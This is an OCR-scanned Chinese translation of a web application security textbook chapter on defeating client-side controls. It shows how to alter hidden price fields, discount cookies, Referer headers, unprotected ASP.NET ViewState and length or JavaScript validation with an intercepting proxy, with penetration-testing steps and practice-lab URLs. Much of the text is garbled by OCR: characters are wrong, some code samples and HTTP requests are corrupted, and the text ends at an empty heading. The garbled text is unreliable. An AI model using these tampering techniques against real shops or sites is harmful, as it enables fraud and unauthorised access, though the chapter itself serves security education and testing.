口 在 某 些 情况 下 ， 跟 路 服务 右上 的 新 数据 可 能 需要 更 新 核心 服务 
堪 端 API， 因 而 会 触发 正式 的 变更 管理 流程 和 回归 测试 。 这 时 ， 实 施 
包 舍 客户 端 数据 传输 的 更 加 细 化 的 解决 方案 可 以 避免 这 种 情况 ， 从 而 
满足 紧凑 的 完工 期 限 要 求 。 

但 是 ， 以 这 种 方式 传送 敏感 数据 通 间 并 不 安全 ， 并 且 会 在 应 用 程 
序 中 造成 大 量 漏 洞 。 


511 隐藏 表单 字段 


隐藏 HTML 表 单字 段 是 一 种 表面 看 似 无 法 修改 ， 通 过 客户 端 传送 
数据 的 芝 用 机 制 。 如 有 果 一 个 表单 标记 为 隐藏 ， 它 殉 不 会 显示 在 屏 攻 


上 。 但 是 ， 用 户 提 交 表 单 时 ， 保 存在 表单 中 的 字段 名 称 和 值 仍 被 送 区 
给 应 用 程序 。 

在 隐藏 表单 字段 中 保存 产品 价格 的 零售 应 用 程序 吏 是 存在 这 种 安 
全 缺陷 的 典型 示例 。 在 Web 应 用 程序 发 展 的 后 期 阶段 ， 这 种 漏洞 极其 
普 裔 ， 现 在 也 绝 没 有 消失 。 典 型 的 表单 如 图 5-1 所 示 。 


ease enter the required quantity: 


Product: i> one Ultimate 
Price: 449 


Quantity: (Maximum quantity is 59) 


图 5-1 ”典型 的 HTML 表 单 


创建 这 个 表单 的 代码 如 下 : 


<form method="pest" action="Shop.aspx?prod=1"> 

Product: iPhone 5 <br/> 

Price: 449 <br/> 

Quantity: <input type="text" name t"quantity"> (Maximum quantity is 50) 
<br/> 

<input type="hidden" name="price" value="449"> 

<input type="submit" value="Buy"> 

</form> 


注意 ， 表 单字 段 名 为 price， 其 被 标记 为 隐藏 。 用 户 提 交 表 单 时 ， 这 个 
字段 将 被 送 交 给 服务 器 : 

POST /shop/28/Shop.aspx?prod=1 HTTP/1.1 

Host: mdsec.net 


Content-Type: application/x-www-form-urlencoded 
Content-Length: 20 


quantity=lé&price=449 


尝试 访问 


http://mdsec.net/shop/28/ 


现在 ， 虽 然 price 字 段 并 未 显示 在 屏幕 上 ， 用 户 无 法 对 其 进行 编 
辑 ， 但 这 只 是 因为 应 用 程序 指示 浏 宽 絮 隐 藏 该 子 段 而 已 。 因 为 在 客户 
问 进 行 的 一 切 操 作 最 终 将 由 用 户 控 制 ， 用 户 需 要 编辑 价格 时 就 可 解除 
这 个 限制 。 

要 实现 编辑 操作 ， 一 种 方法 是 保存 HTML 页 面 的 源 代 码 ， 编 辑 字 
段 的 值 ， 然 后 将 源 代 码 重 狐 载 入 浏 贤 右 ， 并 单 击 Buy 按 钮 。 但 征 ， 使 
用 拦截 代理 服务 器 (intercepting proxy) 对 数据 进行 动态 修改 更 加 简单 


在 攻击 Web 应 用 程序 时 ， 拦 截 代 理 服 务 器 极其 有 用 ， 它 是 一 种 不 
可 或 缺 的 工具 。 我 们 可 以 找到 大 量 拦截 代理 服务 器 工具 ， 本 书 使 用 其 
中 一 位 作者 编写 的 Burp Proxy 工 具 。 

代理 服务 器 位 于 Web 浏 贤 絮 和 目标 应 用 程序 之 间 。 它 拦截 应 用 程 
序 发 布 和 收 到 的 每 一 个 HTTP 或 HTTPS 请 求 和 上 响应。 用户 可 通过 它 拦 
截 任何 消 轧 ， 对 其 进行 检查 或 修改 。 如 果 之 前 从 未 用 过 拦截 代理 服务 
右 ， 请 参阅 第 20 草 了 解 有 关 拦 截 代 理 服务 器 的 运行 机 制 ， 如 何 配置 和 
使 用 拦截 代理 服务 句 的 详细 信息 。 

安 效 拦截 代理 服务 絮 并 进行 相应 配置 后 就 可 以 拦截 提交 表单 的 请 
求 ， 随 意 修 改 price 字 段 的 值 ， 如 图 5-2 所 示 。 


图 5-2 ”使 用 拦截 代理 服务 器 修改 隐藏 表单 字段 的 值 


如 琳 应 用 程序 根据 表单 提交 的 价格 处 理 交 易 ， 束 能 够 以 选择 的 任 
何 价格 购买 该 产品 。 


Vo ”提示 “如 果 发 现 应 用 程序 易于 受到 这 种 攻击 ， 看 看 是 否 可 


以 提交 一 个 负数 价格 值 。 有 些 时 候 ， 应 用 程序 居然 接受 使 用 负数 价 
格 值 的 交易 。 攻 击 者 不 仅 收 到 订购 的 货物 ， 信 用 卡 还 会 收 到 退 款 
一 一 一 种 两 面 得 利 的 情况 《如 果 出 现 这 种 情况 的 话 ) 。 


5.1.2 HTTP cookie 


HTTP cookie iw & Pia IRAE PP aS Lil] © FUG 
FA BY — PE, HTTP cookie 一 般 并 不 显示 在 屏幕 上 ， 也 不 可 由 用 户 直 接 
修改 。 当 然 ， 用 户 可 使 用 拦截 代理 服务 器 ， 通 过 更 改 设置 cookie 的 服 


务 需 响应 或 随后 发 布 这 些 cookie 的 客户 端 请 求 ， 对 HTTP cookie 进 行 修 


pes 

下 面 以 前 面 的 示例 〈 稍 作 修改 ) 为 例 进 行 说 明 。 消 费 者 登录 应 用 
程序 后 ， 收 到 以 下 啊 应 : 

HTTP/1.1 200 OK 

Set-Cookie: DiscountAgreed=25 

Content-Length: 1530 


DiscountAgreed cookie 是 依靠 客户 端 控件 (基于 cookie 一 般 无 法 被 
修改 这 个 事实 ) 保护 通过 客户 前 传 壕 的 数据 的 奥 型 示例 。 。 如 有 果 应 用 程 
序 信任 DiscountAgreed cookie 返 回 给 服务 恬 的 值 ， 那 么 消费 者 修改 这 个 
值 束 可 获得 任意 折扣 。 例 如 : 


POST /shop/92/Shop.aspx?prod=3 HTTP/1.1 
Host: mdsec.net 

Cookie: DiscountAgreed=25 
Content-Length: 10 


quantity=1 


尝试 访问 


http://mdsec.net/shop/92/ 


5.1.3 URL 参数 


应 用 程序 常常 使 用 预先 设 定 的 URL 参 数 通 过 客户 端 传送 数据 。 例 
如 ， 用 户 浏览 产品 目 未 时， 应 用 程序 会 问 他 们 提供 指 回 下 列 URL 的 超 


链接 : 


http://mdsec.net/shop/?prod=3&pricecode=32 

如 宁 包 售 参 数 的 URL 显 示 在 浏览 右 的 地 址 栏 中 ， 任 何 用 户 不 需要 
使 用 工具 就 可 任意 修改 其 中 的 参数 。 但 是 ， 在 许多 情况 下 ， 应 用 程序 
并 不 希望 普通 用 户 碍 看 或 修改 URL 人 参数。 例如 : 

口 使 用 包含 参数 的 URL 加 载 甬 入 图 像 时 ; 

口 使 用 包含 参数 的 URL 加 载 框架 内 容 时 ; 

口 表 单 使 用 POST 方 法 并 且 其 目标 URL 包 含 预 完 设 定 的 参数 时 ; 

口 应 用 程序 使 用 弹出 窗口 或 其 他 方法 隐藏 浏 贤 厦 地址 栏 时 。 

= - , ARTEMU, KATET CME H ERRERA ar E E AEA 
URL 参 数 。 


5.1.4 ”Referer 消 息 头 


浏览 絮 在 大 多 数 HTTP 请 求 中 使 用 Referer 消 息 尖 。 浏 览 器 使 用 这 个 
消息 头 指示 提出 当前 请 求 的 页 面 的 URL 或 者 是 因为 用 户 单 击 了 一 
个 超 链接 或 提交 了 一 个 表单 ， 或 者 是 因为 该 页 面 引 用 了 其 他 资源 (如 
AA) 。 因 此 ， 我 们 可 以 利用 这 个 消息 头 通过 客户 端 传送 数据 ， 这 是 
因为 应 用 程序 处 理 的 UREL 受 其 控制 ， 开 发 者 认为 Referer 消 息 头 可 用 于 
准确 判断 某 个 特殊 的 请 求 由 哪个 URL 生 成 。 

以 帮助 乐 记 密码 的 用 户 重 新 设置 密码 的 机 制 为 例 。 应 用 程序 要 求 
a 然后 再 通过 以 下 请 求 重新 设置 密码 


GET /auth/472/CreateUser.ashx HTTP/1.1 

Host: mdsec.net 

Referer: https://mdsec.net/auth/472/Admin.ashx 

应 用 程序 可 以 使 用 Referer 消 息 头 证 实 这 个 请 求 是 在 正确 的 阶段 

(Admin.ashx) 提出 的 ， 然 后 才 允 许 用 户 访问 请 求 的 功能 。 

但 是 ， 因 为 用 户 控 制 着 每 一 个 请 求 ， 包 括 HTTP 消 息 头 ， 他 可 以 直 
接 进入 CreateUserashx， 并 使 用 拦截 代理 服务 器 将 Referer 消 息 头 的 值 修 
改 为 应 用 程序 需要 的 值 ， 从 而 轻易 避 开 这 种 控制 。 

实际 上 上， 根据 w3.org 标 准 ，Referer 消 息 头 完全 是 可 选 的 。 因 此 ， 
虽然 大 多 数 浏 贤 怖 执行 这 个 消息 头 ， 但 是 ， 使 用 它 控制 应 用 程序 的 功 
能 应 被 视 为 是 一 种 “陈腐 ”的 做 法 。 


尝试 访问 


http://mdsec.net/auth/472/ 


QS 错误 观点 ”不知 何 改 ， 相 比 于 请 求 的 其 他 部 分 (如 


URL) ， 人 们 常常 认为 HTTP 消 息 头 具有 更 强 的 “ 防 自 改 ”能 力 。 这 会 
导致 开发 者 实施 信任 由 Cookie 和 Referer 消 息 头 提交 的 值 的 功能 ， 而 
对 其 他 数据 (如 URL 参 数 ) 执行 严格 的 确认 。 这 种 认识 是 错误 的 

因为 任何 业余 凌 客 在 攻击 应 用 程序 时 都 可 以 使 用 大 量 免费 的 拦 
截 代理 服务 如 工具 轻松 修改 所 有 请 求 数据 。 打 个 比方 ， 假 如 老师 准 
甸 搜 查 你 的 书 保 ， 你 党 得 把 水 枪 减 在 抽 压 底下 会 更 加 安全 ， 因 为 她 
需要 这 下 腰 才 能 发 现 它 。 


渗透 测试 步骤 


(1) 在 应 用 程序 中 ， 确 定 隐藏 表单 字段 、cookie 和 URL 参 数 明 
显 用 于 通过 客户 端 传送 数据 的 任何 情况 。 


(2) 根据 数据 出 现 的 位 置 以 及 参数 名 称 之 类 的 线索 ， 确 定 或 
猜测 它 在 应 用 程序 逻辑 中 发 挥 的 作用 。 

(3) 修改 数据 在 应 用 程序 相关 功能 中 的 值 。 确 定 应 用 程序 是 
人 否 处 理 在 参数 中 提交 的 任意 值 ， 以 及 这 样 做 是 否 会 导致 应 用 程序 易 
于 遭受 任何 攻击 。 


5.1.5 ”模糊 数据 


有 时 候 ， 通 过 客户 端 传 送 的 数据 被 加 密 或 进行 了 某 种 形式 的 模糊 
处 理 ， 因 而 变 得 临 汲 难 懂 。 例 如 ， 下 面 的 产品 价格 并 不 保存 在 隐藏 字 
段 中 ， 而 是 以 隐 舍 值 (crytic value) 的 形式 传送 。 


<form method=" st" action="Shop. aspx?proc=4"> 

Product: Nokia Infinity <br/> 

Price: 699 <br/> 

Quantity: <input type="text" name="quantity”’> (Maximum quantity is 50) 
<pr/> 


<input type="hidden" name="price" value="699"> 

<input type="hidden" name="pricing_token” 

value="F756D213D291B8F216D694A34383156265C989229"> 
ut type t va lue="Buy"> 

</form> 


WRAL, P ARLE, peace a, AA ArH 
程序 将 检查 模糊 字符 串 的 完整 性 ， 或 对 其 进行 解密 或 去 模糊 处 理 ， 然 
后 处 理 它 的 明文 值 。 这 种 深层 次 处 理 可 能 易于 造成 各 种 漏洞 ;但 是 ， 
要 探查 或 利用 这 种 漏洞 ， 首 先 必须 对 有 效 载 答 进行 适当 的 处 理 。 


尝试 访问 


http://mdsec.net/shop/48/ 


TZ 注解 应 用 程序 的 会 话 处 理 机 制 通 常 通过 客户 端 传送 模糊 
数据 。 在 HTTP cookie 中 传送 的 会 话 令 牌 、 在 隐藏 字段 中 传送 的 反 
CSRF 令 牌 ， 以 及 用 于 访问 应 用 程序 资源 的 一 次 性 URL 令 牌 ， 全 都 
是 在 客户 端 算 改 的 潜在 目标 。 我 们 将 在 第 7 章 详 细 讨 论 针对 这 些 令 
牌 的 注意 事项 。 


渗透 测试 步骤 


有 几 种 方法 可 以 对 通过 客户 端 传送 的 模糊 数据 实施 攻击 。 

(1) 如 果 知 道 模糊 字符 串 的 明文 值 ， 可 以 尝试 破译 模糊 处 理 
所 使 用 的 模糊 算法 。 

(2) 如 第 4 章 所 述 ， 应 用 程序 的 其 他 地 方 可 能 包含 一 些 功能 ， 
攻击 者 可 以 利用 它们 返回 由 目 己 控制 的 一 段 明 文生 成 的 模糊 字符 
串 。 在 这 种 情况 下 ， 攻 击 者 可 以 癌 目 标 功能 直接 提交 任意 一 个 有 效 


载 何 ， 获 得 所 需要 的 字符 串 。 

(3) 即使 模糊 字符 串 完全 无 法 理解 ， 也 可 以 在 其 他 情况 下 重 
新 传送 它 的 值 ， 实 现 某 种 恶意 效果 。 例 如 ， 前 面 显示 的 表单 的 
pricing_token 参 数 中 可 能 包含 一 个 加 蜜 的 产品 价格 。 尽 管 攻击 者 无 
法 对 选择 的 任意 价格 以 相同 的 算法 进行 加 密 ， 但 是 ， 他 们 可 以 把 对 
一 个 更 加 便宜 的 产品 的 加 密 价 格 复制 过 来 ， 放 在 这 里 提交 。 

(4) 如 采 其 他 所 有 方法 全 都 无 效 ， 还 可 以 通过 提交 畸形 字符 
捉 一 一 如 包含 超 长 值 、 不 同 字符 集 等 错误 的 字符 串 一 一 竹 试 攻击 负 
页 对 模糊 数据 进行 解密 或 去 模糊 处 理 的 服务 右 端 逻辑 。 


5.1.6 ASP.NET ViewState 


ASP.NET ViewState 是 一 种 通过 客户 端 传 送 模糊 数据 的 常用 机 制 。 
它 是 一 个 由 所 有 ASPNET Web 应 用 程序 默认 创建 的 隐藏 字段 ， 其 中 包 
含 关于 当前 页 面 状态 的 序列 化 信息 。ASP.NET 平 台 使 用 ViewState 提 高 
服务 器 的 性 能 一 一 服务 器 通过 它 在 连续 提交 请 求 的 过 程 中 保存 用 户 界 
面 中 的 元 素 ， 而 不 需要 在 服务 器 端 维护 所 有 相关 的 状态 信息 。 例 如 ， 
服务 器 会 根据 用 户 提交 的 参数 填充 下 拉 列 表 。 用 户 随后 提交 请 求 时 ， 
浏览 器 并 不 向 服务 器 提交 列表 的 内 容 。 相 反 ， 浏 览 器 提交 隐藏 的 
ViewState 字 段 ， 其 中 包含 该 列表 的 序列 化 格式 。 然 后 ， 服 务 器 对 
ee 
用 o 


除 这 种 核心 功能 外 ， 开 发 者 还 在 连续 提交 请 求 的 过 程 中 使 用 
ViewState 保 存 任意 信息 。 例 如 ， 应 用 程序 可 以 不 将 产品 价格 保存 在 隐 


藏 表单 字段 中 ， 而 古 将 其 保存 在 ViewState 中 ， 如 下 所 示 : 
string price = getPrice (prodno); 
ViewState.Add(“price”, price); 

返回 给 用 户 的 表单 如 下 所 示 : 


string price = getPrice(prodno)}; 


ViewState.Add ("price*", price); 
当 用 户 提 交 表 单 时 ， 浏 贤 器 将 发 送 以 下 请 求 : 


<form method="post" action="Shop. aspx?prod=3"> 

<input type="hidden" name="__VIEWSTATE” id="__VIEWSTATE” 
value=" /wEPDwWULLTE1LODcxN] kwNjIPFoleBXByaVNlLBOMzZOTLkZA==" 
Product: HTC Avalanche <br/> 

Price: 399 <br/> 


Quantity: <input type="text" name="quantity"’> (Maximum quantity is 50) 


<br/> 
<input type="submit" value="Buy"> 
</form> 


很 明显 ， 上 面 的 请 求 中 并 不 包含 产品 价格 只 有 订购 的 数量 和 
模糊 处 理 后 的 ViewState 参 数 。 随 意 更 改 这 个 参数 会 导致 应 用 程序 显示 
错误 消息 ， 并 因此 终止 购买 交易 。 

ViewState 参 数 实际 上 是 一 个 Base64 编 码 字 符 串 ， 用 户 可 以 轻松 对 
这 个 字符 串 进行 解码 ， 以 查看 其 代表 的 价格 参数 ， 如 下 所 示 : 


POST /shop/75/Shop.aspx?prod=3 HTTP/1.1 


Host: mdsec. net 


Content-Type: application/x-www-form-urlencoded 


Content-Length: 77 


VIEWSTATR=%2 PwRPDWULLTE1LODcCXN 4 kwN4 1 PFaoTeBXByawWn 1 BOMZOTLKZAS3DS3DE 
quantity=1 


W 提示 在 对 一 个 可 能 为 Base64 编 码 的 字符 串 进 行 解码 时 ， 
用 户 常 常会 犯 一 个 错误 ， 即 从 字符 串 的 错误 位 置 开始 解码 。 鉴 于 


Base64 编 码 的 特点 ， 如 果 从 错误 的 位 置 开始 解码 ， 解 码 后 的 字符 串 
中 会 出 现 乱 码 。Base64 采 用 基于 数据 块 的 格式 ， 每 4 字 市 的 编码 数 
据 解码 后 会 变 为 3 个 字 节 。 因 此 ， 如 有 果 解 码 后 的 Base64 字 符 串 并 无 
意义 ， 请 尝试 从 编码 字符 串 中 的 4 个 相 邻 的 偏 移 值 位 置 开始 解码 。 


默认 情况 下 ，ASP.NET 平 台 通过 在 ViewState 中 加 入 一 个 密 钥 散 列 
( 称 为 MAC 保 护 ) 来 防止 自 改 。 但 是 ， 一 些 应 用 程序 禁用 了 这 项 默认 

ee 这 意味 着 攻击 人 员 可 以 修改 ViewState 的 值 ， 以 确定 其 是 

会 对 应 用 程序 的 服务 屁 端 处 理 产 生 影 | n ° 

Burp Proxy 提 供 一 个 指示 ViewState 是 否 受 MAC 保 护 的 ViewState 解 
析 器 ， 如 图 5-3 所 示 。 如 果 ViewSt te 求 受到 保护 则 攻击 人 员 可 以 使 用 
ViewState 树 下 的 十 六 “ 进 制 编辑 器 在 Burp 中 编辑 ViewState 的 内 容 。 在 问 
ARH a8 BE PY To ACS TE AMY, Burp 将 发 送 经 过 更 靳 的 ViewState， 有 具体 
到 前 面 的 示例 ， 这 样 承 可 以 更 改 购物 时 商品 的 价格 。 


burp suite professional a | 
ou moud repemer window Nheip 
target proxy | spicer scanner nvuser repeater sequencer decoder comparer options alerts 
intercept opbons histo 
request io Mipimdsecnstët 11/21 
forward drop Hiercopt is on Lo 
state 
? ViewState v2.0 compatible [MAC ts not enabled 
» Pal 
> Pah 
sting 
Pair 
> Lis 
string 
swing 9 
null 
null 
4 »| 
0 D1 i 158716006 
1 ot 3 2 price 399 
2 i4 dd 


图 5-3 ”如 果 未 设置 EnableViewStateMac 选 项 ，Burp Proxy 可 解码 并 显示 ViewState， 
人 允许 攻击 者 查看 其 内 容 并 对 它们 进行 编辑 


尝试 访问 


http://mdsec.net/shop/76/ 


渗透 测试 步骤 


(1) 如 果 要 攻击 ASPNET 应 用 程序 ， 确 定 是 否 对 ViewState 启 
用 了 MAC 保 护 。 如 果 ViewState 结 构 末尾 存在 一 个 20 字 万 的 散 列 ， 即 
表示 应 用 程序 启用 了 MAC 保 护 。 可 以 使 用 Burp Suite 中 的 解析 器 确 
定 上 述 散 列 是 否 存在 。 

(2) 即使 ViewState 受 到 保护 ， 还 可 以 解码 各 种 不 同 应 用 程序 
页 面 中 的 ViewState 参 数 ， 了 解 应 用 程序 是 否 使 用 ViewState 通 过 客户 
端 传送 任何 敏感 数据 。 

(3) 壬 斌 修改 ViewState 中 某 个 特殊 参数 的 值 ， 但 不 破坏 它 的 
结构 ， 看 看 是 否 会 导致 错误 消息 。 

(4) 如果 能 够 修改 ViewState 而 不 会 造成 错误 ， 则 应 该 分 析 
ViewState 中 每 个 参数 的 功能 ， 以 及 应 用 程序 是 否 使 用 这 些 参数 保存 
任何 定制 数据 。 和 尝试 用 专门 设计 的 值 代 蔡 每 一 个 参数 ， 探 查 常 见 的 
漏洞 ， 了 驶 像 检 查 通 过 客户 端 传送 的 其 他 数据 项 一 样 。 

(5) 注意 ， 不 同 页 面 可 能 启用 或 禁用 MAC 保 护 ， 因 此 有 必要 
测试 应 用 程序 的 每 一 个 重要 页 面 ， 了 解 其 中 是 否 存在 ViewState 攻 击 
漏洞 。 如 果 在 局 用 被 动 扫描 的 情况 下 使 用 Burp Scanner, Burp 将 目 动 
报告 任何 使 用 ViewState 但 未 启用 MAC 保 护 的 页 面 。 


9.2 : HTML 


应 用 程序 使 用 客户 端 控 件 限 制 客 户 端 提交 的 数据 的 另 一 个 主要 控 
J 征 最 初 不 由 服务 器 指定 ， 而 是 由 客户 端 计算 机 目 己 收集 的 数 
F o 

HTML 表 单 是 一 种 最 简单 、 最 季 用 的 机 制 ， 主 要 用 于 从 用 户 收集 
输入 并 将 其 提交 给 服务 器 。 用 户 在 已 命名 的 文本 字段 中 输入 数据 ， 再 
将 它们 以 名 / 值 对 的 形式 提交 给 服务 絮 ， 是 这 种 方法 的 最 基本 应 用 。 但 
征 ， 表 单 还 有 其 他 用 法 ， 即 对 用 户 提 区 的 数据 施加 限制 或 执行 确认 检 
查 。 当 应 用 程序 使 用 这 些 客户 端 控 件 作为 安全 机 制 ， 防 御 恶 意 输入 
0 致使 应 用 程序 非常 易于 受到 
T o 


52i $ 


下 面 对 本 章 开头 部 分 的 HTML 表 单 稍 作 修改 ， 规 定 quantity 字 段 的 
最 大 长 度 为 1: 


<form method="post" action-"Shon.aspx?prod-1"> 
Product: iPhone 5 <br/> 
Pric 449 <br 
Quantity ut typ text ame="quantit naxlength="1"> r 
t id nam L valu: 449 
input mit val B 
</form> 


Tre, Dita BALE Ae ABP AE a ee SE 
ff, MAAR Aarne AE tN EWE quantity2 R/T 10 e {8 
征 ， 通 过 拦截 提交 表单 的 请 求 ， 并 在 其 中 输入 任意 值 ， 或 拦截 包含 表 
单 的 啊 应 ， 并 删除 maxlength 属 性 ， 就 可 以 轻易 避 开 这 种 限制 。 


拦截 响应 


试图 拦截 并 修改 服务 右 啊 应 时 ， 攻 击 者 可 能 发 现代 理 服务 器 显 
IRA PERHE ° 


HTTP/1.1 304 Not Modified 

Date: Wed, 6 Jul 2011 22:40:20 GMT 
Etag: “6c7-5fcc0900” 

Expires: Thu, 7 Jul 2011 00:40:20 GMT 
Cache-Control: max-age=7200 


产生 这 个 响应 是 因为 浏览 器 已 经 在 缓存 中 保存 了 所 请 求 资 源 的 
副本 。 当 浏览 絮 请 求 一 个 已 存 入 缓存 的 资源 时 ， 它 通常 会 在 请 求 中 
添加 男 外 两 个 消息 涉 ， 分 别 为 Hf-Modified-Since 和 If-None-Match 消 忆 
L, UR Ata: 


GET /scripts/validate.js HTTP/1.1 

Host: wahh-app.com 

If-Modified-Since: Sat, 7 Jul 2011 19:48:20 GMT 
If-None-Match: “6c7-5fcc0900” 


这 些 消 息 头 告诉 服务 器 浏览 器 上 次 更 新 缓存 副本 的 时 间 。Etag 
字符 串 (由 服务 器 随 资源 副本 一 起 提供 ) 是 一 种 序列 号 ， 服 务 器 为 
每 个 可 缓存 的 资源 分 配 一 个 Etag， 如 果 资 源 被 修改 ， 它 也 会 随 之 更 
新 。 如 果 服 务 器 拥有 比 If-Modified-Since 消 息 头 中 指定 日 期 更 新 的 资 
源 ， 或 者 如 果 当 前 版 本 的 Etag 与 INone-Match 消 息 头 中 指定 的 Etag 
不 匹配 ， 那 么 服务 器 就 会 在 响应 中 提供 最 新 的 资源 。 否 则 ， 它 将 返 
回 和 本 例 相 同 的 304 响 应 ， 通 知 浏览 器 资源 没有 被 修改 ， 浏 览 右 应 
使 用 缓存 中 的 副本 。 

如 果 是 这 样 ， 必 须 拦截 并 修改 浏览 絮 保 存在 绥 存 中 的 资源 ， 可 
以 拦截 相关 请 求 并 删除 I-Modified-Since 和 If-None-Match 消 息 头 ， 让 
服务 器 在 啊 应 中 提供 所 请 求 资源 的 完整 版 本 。Burp Proxy 中 有 一 个 


从 每 个 请 求 中 删除 这 些 消 妃 头 的 选项 ， 可 轿 兰 由 浏览 右 发 送 的 所 有 
缓存 信息 。 


渗透 测试 步骤 


(1) 寻找 包 售 maxlength 属 性 的 表单 元 素 。 提 交大 于 这 个 长 度 
但 其 他 格式 合法 的 数据 例如， 如果 应 用 程序 要 求 数字 ， 则 提交 一 


个 数值 ) 。 

(2) 如 果 应 用 程序 接受 这 个 超 长 的 数据 ， 则 可 以 据 此 推断 出 
服务 器 并 没有 采用 客户 端 确认 机 制 。 

(3) 根据 应 用 程序 随后 对 参数 进行 的 处 理 ， 可 以 通过 确认 机 
制 中 存在 的 负 隐 利用 其 他 漏洞， 如 SQL 注入 、 路 站 点 并 本 或 缓 区 
溢出 。 


5.2.2 ”基于 脚本 的 确认 


HTML 表 单 内 置 的 输入 确认 机 制 极其 简单 ， 而 且 不 够 详细 ， 不 足 
以 对 各 种 输入 执行 相关 确认 。 例 如 ， 用 户 注册 表单 中 可 能 包含 姓名 、 
电子 邮件 地 址 、 电 话 号 码 和 邮政 编码 字段 ， 所 有 这 些 字段 都 要 求 不 同 
的 输入 。 因 此 ， 开 发 者 通常 在 脚本 中 执行 定制 的 客户 端 输入 确认 。 下 
面 对 本 章 开 头 的 示例 进行 一 些 修改 ， 以 说 明 这 个 问题 


<form method="post” action="Shop.aspx?prod=2" onsubmit="return 
valicateForm(this) "> 

Preduct: Samsung Multiverse <br/> 

Price: 399 <br/> 

Quantity: <input type="text" name="“quantity”’> (Maximum quantity is 50) 
<br/> 

<input type="submit" value="Buy"> 

</form> 


<script>function validateForm(theFrorm) 
{ 
var isInteger = /*\d+$/; 
var valid = isInteger.test (quantity) && 
quantity > 0 && quantity <= 50; 
if (!valid) 
alert('Please enter a valid quantity'); 
return valid; 
} 
</script> 


尝试 访问 


http://mdsec.net/shop/139/ 


form 标 签 的 onsubmit 属 性 指示 浏览 器 在 用 户 单 击 “ 提 交 ” 按 钮 时 运 
行 ValidateForm 函 数 ， 并 且 只 有 在 该 函数 返回 “ 真 ? 时 才 提 交 表 单 。 这 种 
机 制 帮 助 客户 端 阻止 提 区 表单 的 企图 ， 对 用 户 的 输入 执行 定制 的 确认 
检查 ， 进 而 决定 是 否 接 受 该 输入 。 上 面 示例 中 采用 的 确认 机 制 极 其 人 简 
单 ， 只 检查 在 amout 字 段 中 输入 的 数据 是 否 为 介 于 1 到 50 之 间 的 整数 。 

这 种 类 型 的 客户 端 控 制 非 常 容易 解除 ， 但 通常 足以 禁用 浏 顺 右 中 
的 JavaScript。 如 果 是 这 样 ， 并 且 忽 略 onsubmit 属 性 ， 那 么 ， 不 需要 任 
何 定 制 确认 天 可 以 提交 表单 。 

但 是 ， 如 果 应 用 程序 依靠 客户 端 脚本 执行 正常 操作 (如 构造 部 分 
用 户 界 面 ) ， 完 全 禁用 JavaScript 可 能 会 终止 应 用 程序 。 另 一 种 更 加 合 
理 的 办 法 是 在 浏览 器 的 输入 字段 中 输入 一 个 民 性 (已 知 无 恶意 ) 值 ， 
然后 用 代理 服务 絮 拦 截 确 认 后 提交 的 表单 ， 并 将 其 中 的 数据 修改 成 想 
要 的 值 。 通 常 ， 这 是 解除 基于 JavaScript 的 确认 的 最 简单 有 效 的 方法 。 

另外 ， 可 以 拦截 包含 JavaScript 确 认 程 序 (validation routine) 的 服 
务 器 响应 ， 修 改 其 脚本 使 其 失效 在 前 面 的 示例 中 ， 更 改 每 一 个 
ValidateForm 芳 数 使 其 返回 “ 真 ” 即 可 。 


渗透 测试 步骤 


a ee eee 
认 的 情况 。 

(2) 通过 修改 所 提交 的 请 求 ， 在 其 中 插入 无 效 数 据 ， 或 修改 
确认 代码 使 其 失效 ， 向 服务 器 提交 确认 机 制 通常 会 阻止 的 数据 。 

(3) 与 长 度 限制 一 样 ， 确 定 服务 器 是 否 采用 了 和 客户 端 相同 
oe 
0 

(4) 注意 ， 如 果 在 提交 表单 前 有 几 个 输入 字段 需要 由 客户 端 
确认 机 制 检验 ， 需 要 分 别 用 无 效 数据 测试 每 一 个 字段 ， 同 时 在 所 有 
其 他 字段 中 使 用 有 效 数 据 。 如 果 同 时 在 几 个 字段 中 提交 无 效 数据 ， 
可 能 服务 历 在 识别 出 第 一 个 无 效 字 段 时 惑 已 经 停止 执行 表单 ， 从 而 
使 测试 无 法 到 达 应 用 程序 的 所 有 可 能 代码 路 径 。 


人 注解 使 用 客户 端 JavaScript 程 序 确认 用 户 输入 的 做 法 在 


Web 应 用 程序 中 非常 普 裔 ， 但 这 并 不 表示 这 种 应 用 程序 全 都 易于 遗 
受 攻击 。 只 有 当 服 务 器 并 未 采用 和 客户 端 相同 的 确认 机 制 ， 以 及 能 
够 避 开 客户 端 确认 的 专门 设计 的 输入 可 在 应 用 程序 中 造成 某 种 无 法 
预料 的 行为 时 ， 应 用 程序 才 存在 风险 。 

在 绝 大 多 数 情况 下 ， 在 客户 端 确认 用 户 输入 有 助 于 提高 应 用 程 
序 的 性 能 ， 改 矢 用 户 体 验 。 例 如 ， 在 填写 详细 的 注册 表单 和 时， 普通 
用 户 可 能 会 犯 许多 错误 ， 如 忽略 必要 的 字段 或 电话 号 码 格式 出 现 错 
误 。 如 采 不 采用 客户 端 确 认 机 制 ， 更 正 这 些 错 误 可 能 需要 多 次 加 载 
注册 页 面 ， 反 复 问 服务 需 传 送 请 轧 。 在 客户 端 执行 基本 的 确认 检查 
可 使 用 户 体验 更 佳 ， 减 轻 服务 器 的 负担 。 


5.2.3 ”禁用 的 元 素 


如 条 HTML 表 单 中 的 一 个 元 素 标记 为 栓 用 ， 它 会 在 屏幕 上 出 现 ， 
但 以 灰色 显示 ， 并 且 无 法 像 彰 规 控 件 那 样 编辑 或 使 用 。 而 且 ， 提 交 表 
单 时 ， 表 单 也 不 向 服务 器 传送 这 个 元 素 。 以 下 面 的 表单 为 例 : 


<form method="post" action="Shop.aspx?prod=5*> 

Product: Blackberry Rude <br/> 

Price: <input type="text" disabled="true" name="price" value="299"> 
<br/> 


Quantity: <input type="text" name="quantity"> (Maximum quantity is 50} 
<br/> 
<input type="submit" values" Buy"> 


这 个 表单 中 的 产品 价格 位 于 禁用 的 文本 字段 中 ， 并 出 现在 屏幕 
上 ， 如 图 5-4 所 示 。 


(Mzximum quantity is 50° 


图 5-4 包含 禁用 的 输入 字段 的 表单 


提交 该 表单 时 ， 应 用 程序 只 同 服 务 絮 传送 quantity 参 数 。 但 是 ， 存 
在 禁用 字段 表示 应 用 程序 最 初 可 能 已 经 使 用 过 price 参 数 (可 能 在 开发 
阶段 用 于 测试 目的 ) 。 这 个 参数 很 可 能 已 经 提交 给 服务 器 并 经 过 应 用 
程序 处 理 了 。 在 这 种 情况 下 ， 应 当 测 试 服务 硕 端 应 用 程序 是 否 仍然 会 
处 理 这 个 参数 。 如 有 宁 确 实 如 此 ， 可 以 答 试 对 这 种 情况 加 以 利用 。 


尝试 访问 


http://mdsec.net/shop/104/ 


渗透 测试 步骤 


